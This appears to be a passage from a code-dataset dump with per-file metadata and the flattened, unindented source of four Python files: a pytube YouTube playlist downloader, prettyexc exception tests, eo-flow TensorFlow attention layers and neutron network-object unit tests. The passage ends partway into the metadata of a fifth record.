Dataset schema (one row per source file):

| column | type | range | nullable |
|---|---|---|---|
| hexsha | string | length 40–40 | no |
| size | int64 | 1 – 1.03M | no |
| ext | string | 10 classes | no |
| lang | string | 1 class | no |
| max_stars_repo_path | string | length 3–239 | no |
| max_stars_repo_name | string | length 5–130 | no |
| max_stars_repo_head_hexsha | string | length 40–78 | no |
| max_stars_repo_licenses | list | length 1–10 | no |
| max_stars_count | int64 | 1 – 191k | yes |
| max_stars_repo_stars_event_min_datetime | string | length 24–24 | yes |
| max_stars_repo_stars_event_max_datetime | string | length 24–24 | yes |
| max_issues_repo_path | string | length 3–239 | no |
| max_issues_repo_name | string | length 5–130 | no |
| max_issues_repo_head_hexsha | string | length 40–78 | no |
| max_issues_repo_licenses | list | length 1–10 | no |
| max_issues_count | int64 | 1 – 67k | yes |
| max_issues_repo_issues_event_min_datetime | string | length 24–24 | yes |
| max_issues_repo_issues_event_max_datetime | string | length 24–24 | yes |
| max_forks_repo_path | string | length 3–239 | no |
| max_forks_repo_name | string | length 5–130 | no |
| max_forks_repo_head_hexsha | string | length 40–78 | no |
| max_forks_repo_licenses | list | length 1–10 | no |
| max_forks_count | int64 | 1 – 105k | yes |
| max_forks_repo_forks_event_min_datetime | string | length 24–24 | yes |
| max_forks_repo_forks_event_max_datetime | string | length 24–24 | yes |
| content | string | length 1 – 1.03M | no |
| avg_line_length | float64 | 1 – 958k | no |
| max_line_length | int64 | 1 – 1.03M | no |
| alphanum_fraction | float64 | 0 – 1 | no |

Each record below lists its metadata, then the file `content` as a code block, then the per-file statistics (avg_line_length, max_line_length, alphanum_fraction).
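A minimal sketch of how records with this schema could be loaded and inspected. This assumes the Hugging Face `datasets` library; `user/python-stack-dump` is a hypothetical dataset id standing in for the real source:

```python
# Stream a few records and print the schema fields described above.
from datasets import load_dataset

ds = load_dataset("user/python-stack-dump", split="train", streaming=True)
for rec in ds.take(3):
    print(rec["hexsha"], rec["size"], rec["max_stars_repo_name"])
    print(rec["content"][:80])  # first characters of the stored source file
```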
Record 1: hexsha 794d8b5ba2a66727da52af091bb2853a1eb0adfc | size 13,483 | ext py | lang Python

| event | repo_path | repo_name | head_hexsha | licenses | count | min_datetime | max_datetime |
|---|---|---|---|---|---|---|---|
| stars | __main__.py | Lukasdotcom/youtubeMusic | 96a669e9e1c74d7c5a8351cea4043866fad6b8fa | ["MIT"] | null | null | null |
| issues | __main__.py | Lukasdotcom/youtubeMusic | 96a669e9e1c74d7c5a8351cea4043866fad6b8fa | ["MIT"] | 2 | 2021-05-27T12:14:29.000Z | 2021-08-06T14:02:40.000Z |
| forks | __main__.py | Lukasdotcom/youtubeMusic | 96a669e9e1c74d7c5a8351cea4043866fad6b8fa | ["MIT"] | null | null | null |

```python
#! /usr/bin/env python3
from pytube import YouTube, Playlist
import sys
import os
import json
import glob
import vlc
import random
import time
from mutagen.mp4 import MP4
print("youtubeMusic downloader is starting! This program can be used to download your music playlist from youtube for free in a fast and easy way!")
print("If this program is not working for you please put a issue on github. Many issues exist because of the library that this was built on so they may not be fixable temporarily.")
def writeFile(location, info): # Will write info in json format to a file
with open(location, 'w') as f:
json.dump(info, f)
def readFile(location): # Loads the location of a certain file and returns that file if it is json
with open(location, "r") as f:
try:
return json.load(f)
except:
raise Exception(
f"Json file at {location} has corrupted or invalid entries")
print("Searching for configuration files")
try: # Will check for the arguments for the location of the config
location = sys.argv[1]
configLocation = location + ".config.json"
cacheLocation = location + ".cache.json"
except IndexError:
# Will find where the program's directory is.
print("argument missing for directory, using directory of program")
location = sys.path[0].replace("__main__.py", "")
for x in range(len(location)):
if location[x] == "/":
character = "/"
break
elif location[x] == "\\":
character = "\\"
break
if location[-1] != character:
location = f"{location}{character}"
configLocation = location + ".config.json"
cacheLocation = location + ".cache.json"
if not os.path.isdir(location): # Will check if the folder for the config exists
os.makedirs(location)
print("Folder did not exist created new folder at " + location)
writeFile(configLocation + "temp", {})
os.remove(configLocation + "temp")
# Will find the config file and create a new one if it does not exist
print(f"Config stored in {location}")
if not os.path.isfile(configLocation):
print("New folder detected creating new config")
writeFile(configLocation, {})
configInfo = {}
else:
configInfo = readFile(configLocation)
print("Found Configuration files")
if not os.path.isfile(cacheLocation):
print("New folder detected creating new cache")
writeFile(cacheLocation, {})
else:
print("Found cache files")
def update(configInfo): # updates all playlists
global cacheLocation
cacheInfo = readFile(cacheLocation)
number = 1
configLen = len(configInfo)
for x in configInfo:
try: # will check if the playlist is valid
playlist = Playlist(x)
print(
f"Starting update of playlist {number} of {configLen} called {playlist.title} at location {configInfo[x]}")
except Exception: # invalid playlist link: move on to the next one instead of aborting the loop
print(
f"Skipping update of playlist {number} of {configLen} because of invalid link")
number += 1
continue
# Will check if the folder for the config exists
if not os.path.isdir(configInfo[x]):
os.makedirs(configInfo[x])
print(
f"Folder for {playlist.title} did not exist; created new folder at {configInfo[x]}")
howFarVideo = 0 # Used to see how many videos the program is through
videoLen = len(playlist.videos) # how many videos are in the playlist
songList = glob.glob(configInfo[x] + "*.mp3") # a list of all songs already downloaded to make sure there are not extra songs that need to be deleted
# goes through every video in the playlist
for y in playlist.videos:
try: # looks if the metadata is cached
metadata = cacheInfo[y.watch_url]
skip = True
except:
try: # looks if the metadata characteristic exists for a video
metadata = y.metadata.metadata[0]
except:
metadata = {}
skip = False # used to check if the cache needs to be updated
try: # checks the title otherwise uses the title of the video
videoTitle = metadata["Song"]
except:
try:
videoTitle = y.title
skip = False
except:
print("cant find video title skipping")
continue
print(f"Song title not found resorting to video title of {videoTitle}")
bannedCharacters = [".", "'", '"', ",", "/", "\\", "?"] # invalid characters for file names
videoTitle2 = ""
for z in videoTitle: # removes banned characters from a video
if z not in bannedCharacters:
videoTitle2 += z
videoTitle = videoTitle2
try: # Checks for the artist otherwise uses the name of the channel
videoAuthor = metadata["Artist"]
except:
videoAuthor = y.author
if videoAuthor[-7:] == "- Topic": # Channels for some reason have - Topic at the end so that is removed
videoAuthor = videoAuthor[:-8]
skip = False
print(f"Song artist not found using video channel name {videoAuthor}")
videoAuthor2 = ""
for z in videoAuthor: # removes banned characters from a video
if z not in bannedCharacters:
videoAuthor2 += z
videoAuthor = videoAuthor2
try: # Checks if an album is in the metadata
videoAlbum = metadata["Album"]
except:
skip = False
videoAlbum = "unknown"
print(f"Song album not found")
howFarVideo += 1
# prints a status update
print(
f"Playlist {number} of {configLen}; Video {howFarVideo} of {videoLen} called {videoTitle}; ")
name = configInfo[x] + videoTitle + ".mp3"
if name in songList: # checks if the song was already downloaded
songList.remove(name) # removes the song from the deletion queue
print("Already downloaded skipped")
else:
print("Downloading")
try:
# code used to download the song and store it in the right folder with the correct file name
y.streams.filter(file_extension='mp4').filter(
only_audio=True).first().download(output_path=configInfo[x], filename=name)
skip = False
except Exception:
# used for a failure in a download to delete the file also and report it to the user.
print("ERROR while downloading skipping")
try:
os.remove(name)
except Exception:
pass
if not skip: # if the cache for the video needs to be updated it is updated here
# makes the file have the correct metadata
file = MP4(name)
file['title'] = videoTitle
file['author'] = videoAuthor
file['album'] = videoAlbum
file.save()
os.rename(name, configInfo[x] + videoTitle + ".mp3")
cacheInfo[y.watch_url] = {"Song": videoTitle, "Artist": videoAuthor, "Album": videoAlbum}
writeFile(cacheLocation, cacheInfo)
# goes through every video still left in the deletion queue
songLen = len(songList)
howFarVideo = 0
for y in songList:
howFarVideo += 1
os.remove(y)
print(
f"Playlist {number} of {configLen}; Deleting video {howFarVideo} of {songLen} located at {y}")
number += 1
# updates the cache
writeFile(cacheLocation, cacheInfo)
return configInfo
def clearCache(configInfo): # Clears the cache
global cacheLocation
print("Deleting cache")
try:
os.remove(cacheLocation)
except Exception:
print("Cache not found")
return configInfo
def show(configInfo): # print all playlists
print("List of all playlists")
howMany = 0
for x in configInfo:
howMany += 1
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"{howMany}. Link: {x}")
print(f"{howMany}. Name: {playlist}")
print(f"{howMany}. Storage: {configInfo[x]}")
print("")
input("Press enter to continue")
return configInfo
def edit(configInfo): # edit one of them
choice = input("Enter the howmanyth entry you want to change: ")
try:
choice = int(choice)
except ValueError:
choice = 0
if choice > 0 and choice <= len(configInfo):
for x in configInfo:
choice -= 1
if choice < 1:
break
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"Link: {x}")
print(f"Name: {playlist}")
print(f"Storage: {configInfo[x]}")
if input("Enter y to confirm this entry: ") == "y":
print("If you enter nothing for the following the entry will not change")
url = input("Enter the url of the playlist: ")
if url == "":
url = x
location = input(
"Enter the storage location of the playlist; complete path with the / or \\ at the end: ")
if location == "":
location = configInfo[x]
configInfo.pop(x)
configInfo[url] = location
else:
input("Invalid input press enter to continue")
return configInfo
def delete(configInfo):
choice = input("Enter the howmanyth entry you want to delete: ")
try:
choice = int(choice)
except ValueError:
choice = 0
if choice > 0 and choice <= len(configInfo):
for x in configInfo:
choice -= 1
if choice < 1:
break
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"Link: {x}")
print(f"Name: {playlist}")
print(f"Storage: {configInfo[x]}")
if input("Enter y to confirm deletion: ") == "y":
configInfo.pop(x)
else:
input("Invalid input press enter to continue")
return configInfo
def add(configInfo):
url = input("Enter the url of the playlist: ")
location = input(
"Enter the storage location of the playlist; complete path with the / or \\ at the end: ")
configInfo[url] = location
return configInfo
def leave(configInfo):
global configLocation
writeFile(configLocation, configInfo)
print("Left program succesfully")
exit()
def playSong(song):
song.play()
def play(configInfo): # Used to play a playlist
choice = input("Enter the howmanyth entry you want to play: ")
try:
choice = int(choice)
except ValueError:
choice = 0
if choice > 0 and choice <= len(configInfo):
for x in configInfo:
choice -= 1
if choice < 1:
break
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"Link: {x}")
print(f"Name: {playlist}")
print(f"Storage: {configInfo[x]}")
songs = glob.glob(configInfo[x] + "*.mp3")
try:
while True:
name = random.choice(songs)
song = vlc.MediaPlayer(name)
song.play()
print(f"Playing: {name}")
time.sleep(1)
while song.is_playing():
time.sleep(1)
except KeyboardInterrupt:
song.stop()
return configInfo
# list of all functions
options = {
"u": update,
"p": show,
"e": edit,
"d": delete,
"a": add,
"c": clearCache,
"q": leave,
"r": play
}
for x in sys.argv[2:]: # runs every choice put after the location automatically.
try: # Runs the correct function for which one
test = options[x]
skip = False
except KeyError:
print("Invalid Input")
skip = True
if not skip:
configInfo = options[x](configInfo)
writeFile(configLocation, configInfo)
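# Usage sketch (inferred from the argument handling above, not from project
# docs): running
#   python __main__.py /path/to/config/dir/ u q
# updates every configured playlist ("u") and then quits ("q"); with no extra
# arguments, the interactive menu below is shown instead.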
while True:
# Will give the choices to the user
choice = input("""
--help menu--
The following are the options
u - will update all playlists
p - will print all playlist links and where they are stored
e - edit a playlist entry
d - delete a playlist entry (will not delete the actual music files)
a - can be used to add another playlist
c - clear cache used when downloading is not working well
r - used to play a playlist and press ctrl-c to stop playing
q - used to quit
""")
try: # Runs the correct function for which one
test = options[choice]
skip = False
except KeyError:
print("Invalid Input")
skip = True
if not skip:
configInfo = options[choice](configInfo)
writeFile(configLocation, configInfo)
```

avg_line_length 37.041209 | max_line_length 181 | alphanum_fraction 0.579174

Record 2: hexsha 794d8b7e819dc62853bd14aa423695613c6d139b | size 5,153 | ext py | lang Python

| event | repo_path | repo_name | head_hexsha | licenses | count | min_datetime | max_datetime |
|---|---|---|---|---|---|---|---|
| stars | tests/prettyexc_test.py | youknowone/prettyexc | 03894a86c72d3196c3326a5a8bce2a961c87f60d | ["BSD-2-Clause-FreeBSD"] | 6 | 2015-10-28T13:40:50.000Z | 2020-03-24T06:05:30.000Z |
| issues | tests/prettyexc_test.py | youknowone/prettyexc | 03894a86c72d3196c3326a5a8bce2a961c87f60d | ["BSD-2-Clause-FreeBSD"] | null | null | null |
| forks | tests/prettyexc_test.py | youknowone/prettyexc | 03894a86c72d3196c3326a5a8bce2a961c87f60d | ["BSD-2-Clause-FreeBSD"] | 2 | 2015-08-31T16:32:00.000Z | 2017-05-31T08:32:42.000Z |

```python
from prettyexc import PrettyException, Environment
from prettyexc import patch
from prettyexc.environment import default_python_environment, human_environment
from prettyexc.exceptions import InvalidArgumentCount, InvalidArgumentKeyword
def test_default():
e = PrettyException()
assert(e)
assert(str(e) == '')
assert(repr(e) == '<prettyexc.core.PrettyException>')
assert(e._show_module() is True)
assert(e._type(e.repr_environment) == 'prettyexc.core.PrettyException')
assert(not e._message(e.unicode_environment))
assert(str([e]) == '[<prettyexc.core.PrettyException>]')
e = PrettyException(200)
assert(str(e) == '200')
assert(str([e]) == '[<prettyexc.core.PrettyException(200)>]')
e = PrettyException("test")
assert(str(e) == 'test')
assert(str([e]) == '[<prettyexc.core.PrettyException("test")>]')
e = PrettyException(code=10)
assert(str(e) == "code=10")
assert(str([e]) == '[<prettyexc.core.PrettyException(code=10)>]')
e = PrettyException(mode='test')
assert(str(e) == 'mode="test"')
assert(str([e]) == '[<prettyexc.core.PrettyException(mode="test")>]')
def test_pythonlike():
p = Exception()
e = PrettyException()
assert(str(e) == str(p))
p = Exception('message')
e = PrettyException('message')
assert(str(e) == str(p))
p = Exception('many', 'args')
e = PrettyException('many', 'args')
# assert(str(e) == str(p), str(e), str(p))
def test_pythondefault():
class PythonException(PrettyException):
unicode_environment = default_python_environment
repr_environment = default_python_environment
e = PythonException()
assert(e)
assert(str(e) == 'PythonException')
assert(str([e]) == '[PythonException]')
def test_format():
class T1Exception(PrettyException):
message_format = u'Raise {code} with {description}.'
e = T1Exception(code=200, description='OK')
assert(e)
assert(e.message == 'Raise 200 with OK.')
assert(str(e) == 'Raise 200 with OK.')
assert(repr(e) == '<{0}.T1Exception(code=200,description="OK")>'.format(__name__))
def test_arguments():
class ArgsException(PrettyException):
pass
e = ArgsException('Message', code=200, description='OK')
assert(e)
assert(len(e.args) == 1)
assert(e.args[0] == 'Message')
assert(e[0] == 'Message')
assert(len(e.kwargs) == 2)
assert(e.kwargs['code'] == 200)
assert(e.kwargs['description'] == 'OK')
assert(e['code'] == 200)
assert(e['description'] == 'OK')
assert(str(e) == '"Message",code=200,description="OK"')
assert(repr(e) == '<{0}.ArgsException("Message",code=200,description="OK")>'.format(__name__))
def test_message():
class T2Exception(PrettyException):
message = u'You should see this message'
e = T2Exception()
assert(e)
assert(str(e) == 'You should see this message')
assert(repr(e) == '<{0}.T2Exception>'.format(__name__))
def test_human():
class T3Exception(PrettyException):
unicode_environment = human_environment
message = u'Shows message.'
e = T3Exception()
assert(str(e) == 'T3Exception: Shows message.')
def test_env():
custom_env = Environment(SHOW_MODULE=True, SHOW_ARGS=False)
class T4Exception(PrettyException):
unicode_environment = custom_env
e = T4Exception(1, 2, 3, 'arg4')
assert(str(e) == '{0}.T4Exception'.format(__name__))
def test_patch():
class AnException(Exception):
def __init__(self, *args):
super(AnException, self).__init__(*args)
self.number = 10
def value(self):
return self.number + 2
patch(AnException, PrettyException)
e = AnException("message", user_id=1)
assert(str(e) == '"message",user_id=1')
assert(repr(e) == '<{0}.AnException("message",user_id=1)>'.format(__name__))
assert(e.value() == 12)
e = PrettyException()
assert(str(e) == '')
def test_transition():
class TransitionException(PrettyException):
_args_kwargs_map = ['code', 'description']
e = TransitionException(200, 'OK')
assert(str(e) == 'code=200,description="OK"')
def test_constraint():
class MinArgsException(PrettyException):
_req_args_count = 2
try:
e = MinArgsException(0)
except InvalidArgumentCount as e:
assert e.expected == 2
assert e.given == 1
e = MinArgsException(0, 1)
e = MinArgsException(0, 1, 2)
class MinKwargsException(PrettyException):
_req_kwargs_keys = ['code', 'desc']
try:
e = MinKwargsException(code=200)
except InvalidArgumentKeyword as e:
assert e.expected == 'desc'
e = MinKwargsException(code=200, desc='blah')
e = MinKwargsException(200, 'blah')
assert e.code == 200
assert e.desc == 'blah'
def test_get_with_index():
class TestException(PrettyException):
pass
e = TestException(1, 2)
assert e[0] == 1
assert e[1] == 2
if __name__ == '__main__':
symbols = list(globals().keys())
for k in symbols:
if k.startswith('test_'):
globals()[k]()
```

avg_line_length 28.469613 | max_line_length 98 | alphanum_fraction 0.63594

Record 3: hexsha 794d8cc7adc1a5e8c894742b28819d6fa4a6298f | size 5,784 | ext py | lang Python

| event | repo_path | repo_name | head_hexsha | licenses | count | min_datetime | max_datetime |
|---|---|---|---|---|---|---|---|
| stars | eoflow/models/pse_tae_layers.py | JDESLOIRES/eo-flow | def495e9292809656b906cfd6b8e7389ff9cea61 | ["MIT"] | 80 | 2019-09-11T08:53:03.000Z | 2022-03-29T05:32:02.000Z |
| issues | eoflow/models/pse_tae_layers.py | JDESLOIRES/eo-flow | def495e9292809656b906cfd6b8e7389ff9cea61 | ["MIT"] | 12 | 2019-10-11T11:00:56.000Z | 2022-01-31T10:43:40.000Z |
| forks | eoflow/models/pse_tae_layers.py | JDESLOIRES/eo-flow | def495e9292809656b906cfd6b8e7389ff9cea61 | ["MIT"] | 21 | 2019-09-11T08:12:57.000Z | 2022-03-07T01:05:05.000Z |

```python
import numpy as np
import tensorflow as tf
import tensorflow.keras.layers as L
from .transformer_encoder_layers import scaled_dot_product_attention, positional_encoding
pooling_methods = {
'mean': tf.math.reduce_mean,
'std': tf.math.reduce_std,
'max': tf.math.reduce_max,
'min': tf.math.reduce_min
}
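# Illustrative note (not part of the original file): each entry maps a name to
# a reduction, e.g. pooling_methods['mean'](x, axis=1) collapses a
# (batch, set, features) tensor over the set dimension to (batch, features).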
class PixelSetEncoder(tf.keras.layers.Layer):
def __init__(self, mlp1=[10, 32, 64], mlp2=[64, 128], pooling='mean_std'):
super().__init__()
self.mlp1 = tf.keras.Sequential([LinearLayer(out_dim) for out_dim in mlp1])
pooling_layers = [SetPooling(method) for method in pooling.split('_')] # avoid shadowing the module-level pooling_methods dict
self.pooling = SummaryConcatenate(pooling_layers, axis=-1)
mlp2_layers = [LinearLayer(out_dim) for out_dim in mlp2[:-1]]
mlp2_layers.append(LinearLayer(mlp2[-1], activation=False))
self.mlp2 = tf.keras.Sequential(mlp2_layers)
self.encoder = tf.keras.Sequential([
self.mlp1,
self.pooling,
self.mlp2
])
def call(self, x, training=None, mask=None):
return self.encoder(x, training=training, mask=mask)
class MultiHeadAttention(tf.keras.layers.Layer):
def __init__(self, n_head, d_k, name='multi_head_attention'):
super().__init__(name=name)
self.n_head = n_head
self.d_k = d_k
self.fc1_q = L.Dense(d_k * n_head,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=np.sqrt(2.0 / d_k)))
self.fc1_k = L.Dense(d_k * n_head,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=np.sqrt(2.0 / d_k)))
self.fc2 = tf.keras.Sequential([
L.BatchNormalization(),
L.Dense(d_k)
])
def split_heads(self, x, batch_size):
"""Split the last dimension into (n_head, d_k).
Transpose the result such that the shape is (batch_size, n_head, seq_len, d_k)
"""
x = tf.reshape(x, (batch_size, -1, self.n_head, self.d_k))
return tf.transpose(x, perm=[0, 2, 1, 3])
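# Shape trace (illustrative, assuming batch=2, seq_len=10, n_head=4, d_k=32):
# (2, 10, 128) -> reshape -> (2, 10, 4, 32) -> transpose -> (2, 4, 10, 32)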
def call(self, q, k, v, training=None, mask=None):
batch_size = tf.shape(q)[0]
q = self.fc1_q(q)
q = self.split_heads(q, batch_size)
q = tf.reduce_mean(q, axis=2, keepdims=True) # MEAN query
k = self.fc1_k(k)
k = self.split_heads(k, batch_size)
# Repeat n_head times
v = tf.expand_dims(v, axis=1)
v = tf.tile(v, (1, self.n_head, 1, 1))
output, attn = scaled_dot_product_attention(q, k, v, mask)
output = tf.squeeze(output, axis=2)
# Concat heads
output = tf.reshape(output, (batch_size, -1))
return output
class TemporalAttentionEncoder(tf.keras.layers.Layer):
def __init__(self, n_head=4, d_k=32, d_model=None, n_neurons=[512, 128, 128], dropout=0.2,
T=1000, len_max_seq=24, positions=None):
super().__init__()
self.positions = positions
if self.positions is None:
self.positions = len_max_seq + 1
self.d_model = d_model
self.T = T
self.in_layer_norm = tf.keras.layers.LayerNormalization(name='in_layer_norm')
self.inconv = None
if d_model is not None:
self.inconv = tf.keras.Sequential([
L.Conv1D(d_model, 1, name='inconv'),
L.LayerNormalization(name='conv_layer_norm')
])
self.out_layer_norm = tf.keras.layers.LayerNormalization(name='out_layer_norm')
self.attention_heads = MultiHeadAttention(n_head, d_k, name='attention_heads')
mlp_layers = [LinearLayer(out_dim) for out_dim in n_neurons]
self.mlp = tf.keras.Sequential(mlp_layers, name='mlp')
self.dropout = L.Dropout(dropout)
def build(self, input_shape):
d_in = input_shape[-1] if self.d_model is None else self.d_model
self.position_enc = positional_encoding(self.positions, d_in, T=self.T)
def call(self, x, training=None, mask=None):
seq_len = tf.shape(x)[1]
x = self.in_layer_norm(x, training=training)
if self.inconv is not None:
x = self.inconv(x, training=training)
pos_encoding = self.position_enc[:, :seq_len, :]
if self.positions is None:
pos_encoding = self.position_enc[:, 1:seq_len+1, :]
enc_output = x + pos_encoding
enc_output = self.attention_heads(enc_output, enc_output, enc_output, training=training, mask=mask)
enc_output = self.mlp(enc_output, training=training)
enc_output = self.dropout(enc_output, training=training)
enc_output = self.out_layer_norm(enc_output, training=training)
return enc_output
def LinearLayer(out_dim, batch_norm=True, activation=True):
""" Linear layer. """
layers = [L.Dense(out_dim)]
if batch_norm:
layers.append(L.BatchNormalization())
if activation:
layers.append(L.ReLU())
return tf.keras.Sequential(layers)
class SetPooling(tf.keras.layers.Layer):
""" Pooling over the Set dimension using a specified pooling method. """
def __init__(self, pooling_method):
super().__init__()
self.pooling_method = pooling_methods[pooling_method]
def call(self, x, training=None, mask=None):
return self.pooling_method(x, axis=1)
class SummaryConcatenate(tf.keras.layers.Layer):
""" Runs multiple summary layers on a single input and concatenates them. """
def __init__(self, layers, axis=-1):
super().__init__()
self.layers = layers
self.axis = axis
def call(self, x, training=None, mask=None):
layer_outputs = [layer(x, training=training, mask=mask) for layer in self.layers]
return L.concatenate(layer_outputs, axis=self.axis)
```

avg_line_length 32.677966 | max_line_length 107 | alphanum_fraction 0.640387

Record 4: hexsha 794d8d023fc10b58c8d4cd639d5c7a5ea95f20c2 | size 7,486 | ext py | lang Python

| event | repo_path | repo_name | head_hexsha | licenses | count | min_datetime | max_datetime |
|---|---|---|---|---|---|---|---|
| stars | neutron/tests/unit/objects/test_network.py | mail2nsrajesh/neutron | 352afb37afcf4952f03436b25618d0066c51f3f1 | ["Apache-2.0"] | null | null | null |
| issues | neutron/tests/unit/objects/test_network.py | mail2nsrajesh/neutron | 352afb37afcf4952f03436b25618d0066c51f3f1 | ["Apache-2.0"] | null | null | null |
| forks | neutron/tests/unit/objects/test_network.py | mail2nsrajesh/neutron | 352afb37afcf4952f03436b25618d0066c51f3f1 | ["Apache-2.0"] | null | null | null |

```python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.objects import base as obj_base
from neutron.objects import network
from neutron.objects.qos import policy
from neutron.tests.unit.objects import test_base as obj_test_base
from neutron.tests.unit import testlib_api
class NetworkPortSecurityIfaceObjTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.NetworkPortSecurity
class NetworkPortSecurityDbObjTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.NetworkPortSecurity
def setUp(self):
super(NetworkPortSecurityDbObjTestCase, self).setUp()
self.update_obj_fields({'id': lambda: self._create_test_network_id()})
class NetworkSegmentIfaceObjTestCase(obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.NetworkSegment
def setUp(self):
super(NetworkSegmentIfaceObjTestCase, self).setUp()
# TODO(ihrachys): we should not need to duplicate that in every single
# place, instead we should move the default pager into the base class
# attribute and pull it from there for testing matters. Leaving it for
# a follow up.
self.pager_map[self._test_class.obj_name()] = (
obj_base.Pager(
sorts=[('network_id', True), ('segment_index', True)]))
class NetworkSegmentDbObjTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.NetworkSegment
def setUp(self):
super(NetworkSegmentDbObjTestCase, self).setUp()
self.update_obj_fields(
{'network_id': lambda: self._create_test_network_id()})
def test_hosts(self):
hosts = ['host1', 'host2']
obj = self._make_object(self.obj_fields[0])
obj.hosts = hosts
obj.create()
obj = network.NetworkSegment.get_object(self.context, id=obj.id)
self.assertEqual(hosts, obj.hosts)
obj.hosts = ['host3']
obj.update()
obj = network.NetworkSegment.get_object(self.context, id=obj.id)
self.assertEqual(['host3'], obj.hosts)
obj.hosts = None
obj.update()
obj = network.NetworkSegment.get_object(self.context, id=obj.id)
self.assertFalse(obj.hosts)
class NetworkObjectIfaceTestCase(obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.Network
def setUp(self):
super(NetworkObjectIfaceTestCase, self).setUp()
self.pager_map[network.NetworkSegment.obj_name()] = (
obj_base.Pager(
sorts=[('network_id', True), ('segment_index', True)]))
class NetworkDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.Network
@mock.patch.object(policy.QosPolicy, 'unset_default')
def test_qos_policy_id(self, *mocks):
policy_obj = policy.QosPolicy(self.context)
policy_obj.create()
obj = self._make_object(self.obj_fields[0])
obj.qos_policy_id = policy_obj.id
obj.create()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj.id, obj.qos_policy_id)
policy_obj2 = policy.QosPolicy(self.context)
policy_obj2.create()
obj.qos_policy_id = policy_obj2.id
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj2.id, obj.qos_policy_id)
obj.qos_policy_id = None
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertIsNone(obj.qos_policy_id)
@mock.patch.object(policy.QosPolicy, 'unset_default')
def test__attach_qos_policy(self, *mocks):
obj = self._make_object(self.obj_fields[0])
obj.create()
policy_obj = policy.QosPolicy(self.context)
policy_obj.create()
obj._attach_qos_policy(policy_obj.id)
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj.id, obj.qos_policy_id)
policy_obj2 = policy.QosPolicy(self.context)
policy_obj2.create()
obj._attach_qos_policy(policy_obj2.id)
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj2.id, obj.qos_policy_id)
def test_dns_domain(self):
obj = self._make_object(self.obj_fields[0])
obj.dns_domain = 'foo.com'
obj.create()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('foo.com', obj.dns_domain)
obj.dns_domain = 'bar.com'
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('bar.com', obj.dns_domain)
obj.dns_domain = None
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertIsNone(obj.dns_domain)
def test__set_dns_domain(self):
obj = self._make_object(self.obj_fields[0])
obj.create()
obj._set_dns_domain('foo.com')
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('foo.com', obj.dns_domain)
obj._set_dns_domain('bar.com')
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('bar.com', obj.dns_domain)
class SegmentHostMappingIfaceObjectTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.SegmentHostMapping
class SegmentHostMappingDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.SegmentHostMapping
def setUp(self):
super(SegmentHostMappingDbObjectTestCase, self).setUp()
self.update_obj_fields(
{'segment_id': lambda: self._create_test_segment_id()})
class NetworkDNSDomainIfaceObjectTestcase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.NetworkDNSDomain
class NetworkDNSDomainDbObjectTestcase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.NetworkDNSDomain
def setUp(self):
super(NetworkDNSDomainDbObjectTestcase, self).setUp()
self.update_obj_fields(
{'network_id': lambda: self._create_test_network_id()})
class ExternalNetworkIfaceObjectTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.ExternalNetwork
class ExternalNetworkDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.ExternalNetwork
def setUp(self):
super(ExternalNetworkDbObjectTestCase, self).setUp()
self.update_obj_fields(
{'network_id': lambda: self._create_test_network_id()})
```

avg_line_length 33.271111 | max_line_length 78 | alphanum_fraction 0.682474

Record 5: hexsha 794d8db77bc38258c667143acbc2d428d5e2223e | size 16,109 | ext py | lang Python

| event | repo_path | repo_name | head_hexsha | licenses | count | min_datetime | max_datetime |
|---|---|---|---|---|---|---|---|
| stars | truffe2/accounting_main/migrations/0010_auto__del_field_budgetline_compte__add_field_budgetline_account.py | JonathanCollaud/truffe2 | 5cbb055ac1acf7e7dc697340618fcb56c67fbd91 | ["BSD-2-Clause"] | 9 | 2016-09-14T02:19:19.000Z | 2020-10-18T14:52:14.000Z |
| issues | truffe2/accounting_main/migrations/0010_auto__del_field_budgetline_compte__add_field_budgetline_account.py | JonathanCollaud/truffe2 | 5cbb055ac1acf7e7dc697340618fcb56c67fbd91 | ["BSD-2-Clause"] | 19 | 2016-11-09T21:28:51.000Z | 2021-02-10T22:37:31.000Z |
